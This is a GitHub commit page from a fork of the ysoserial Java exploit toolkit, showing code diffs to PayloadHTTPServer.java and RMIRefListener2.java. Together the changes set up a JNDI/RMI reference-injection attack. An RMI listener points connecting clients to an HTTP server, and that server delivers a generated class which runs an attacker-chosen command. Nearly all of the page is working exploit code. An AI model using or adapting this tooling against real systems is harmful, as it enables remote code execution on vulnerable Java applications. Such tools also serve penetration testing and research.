Skip to content

Commit

Permalink
update RMIRefListener2
Browse files Browse the repository at this point in the history
  • Loading branch information
@wh1t3p1g
wh1t3p1g committed Feb 5, 2020
1 parent 25a7abf commit bf95d4a
Show file tree
Hide file tree
Showing 2 changed files with 37 additions and 20 deletions.
22 changes: 19 additions & 3 deletions src/main/java/ysoserial/exploit/PayloadHTTPServer.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -16,7 +16,18 @@
* @author wh1t3P1g
* @since 2020/2/5
*/
public class PayloadHTTPServer {
public class PayloadHTTPServer implements Runnable{

private int port;
private String classname;
private String command;
private HttpServer server;

public PayloadHTTPServer(int port, String classname, String command) {
this.port = port;
this.classname = classname;
this.command = command;
}

public static void main(String[] args) {
if ( args.length < 3 ) {
Expand All @@ -29,9 +40,14 @@ public static void main(String[] args) {
String classname = args[1];
String command = args[2];

PayloadHTTPServer server = new PayloadHTTPServer(port, classname, command);
server.run();
}

public void run(){
try {
System.err.println("* Opening Payload HTTPServer on " + port);
HttpServer server = HttpServer.create(new InetSocketAddress(port), 0);
server = HttpServer.create(new InetSocketAddress(port), 0);
server.createContext("/"+classname+".class", new PayloadHandler(classname, command));
server.setExecutor(null);
server.start();
Expand Down Expand Up @@ -71,7 +87,7 @@ private void generate() throws Exception {

@Override
public void handle(HttpExchange exchange) throws IOException {
System.err.println("Have connection from "+exchange.getRemoteAddress());
System.err.println("Have request from "+exchange.getRemoteAddress());
System.err.println("Get request <"+exchange.getRequestMethod()+"> "+exchange.getRequestURI());
exchange.sendResponseHeaders(200, obj.length);
OutputStream os = exchange.getResponseBody();
Expand Down
35 changes: 18 additions & 17 deletions src/main/java/ysoserial/exploit/RMIRefListener2.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -9,16 +9,6 @@
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;


/**
* Generic JRMP listener
*
* Opens up an JRMP listener that will deliver the specified payload to any
* client connecting to it and making a call.
*
* @author mbechler
*
*/
@SuppressWarnings ( {
"restriction"
} )
Expand All @@ -39,20 +29,31 @@ public RMIRefListener2(int port, String factoryName, String factoryURL, Object p

public static final void main ( final String[] args ) throws Exception{

if ( args.length < 3 ) {
System.err.println(RMIRefListener2.class.getName() + " <port> <factory_name> <factory_url>");
if ( args.length < 4 ) {
System.err.println(RMIRefListener2.class.getName() + "<registryHost:registryPort> <PayloadServerPort> <factory_name> <command>");
System.exit(-1);
return;
}

Reference reference = new Reference(args[ 1 ],args[ 1 ],args[ 2 ]);
String[] registry = args[0].split(":");
int registryPort = Integer.parseInt(registry[1]);
String host = registry[0];

int httpServerPort = Integer.parseInt(args[1]);
String factoryName = args[2];
String factoryURL = "http://"+host+":"+httpServerPort+"/";
String command = args[3];

Reference reference = new Reference(factoryName, factoryName, factoryURL);
final Object payloadObject = new ReferenceWrapper(reference);

try {
int port = Integer.parseInt(args[ 0 ]);
System.err.println("* Opening JRMP listener on " + port);
System.err.println("* URL: rmi://some-host:"+port+"/"+args[1]);
RMIRefListener2 c = new RMIRefListener2(port, args[1], args[2], payloadObject);
PayloadHTTPServer server = new PayloadHTTPServer(httpServerPort, factoryName, command);
server.run();
System.err.println("* Opening JRMP listener on " + registryPort);
System.err.println("* URL: rmi://"+host+":"+registryPort+"/"+factoryName);
System.err.println("* FactoryURL: "+factoryURL);
RMIRefListener c = new RMIRefListener(registryPort, payloadObject);
c.run();
}
catch ( Exception e ) {
Expand Down

0 comments on commit bf95d4a

Please sign in to comment.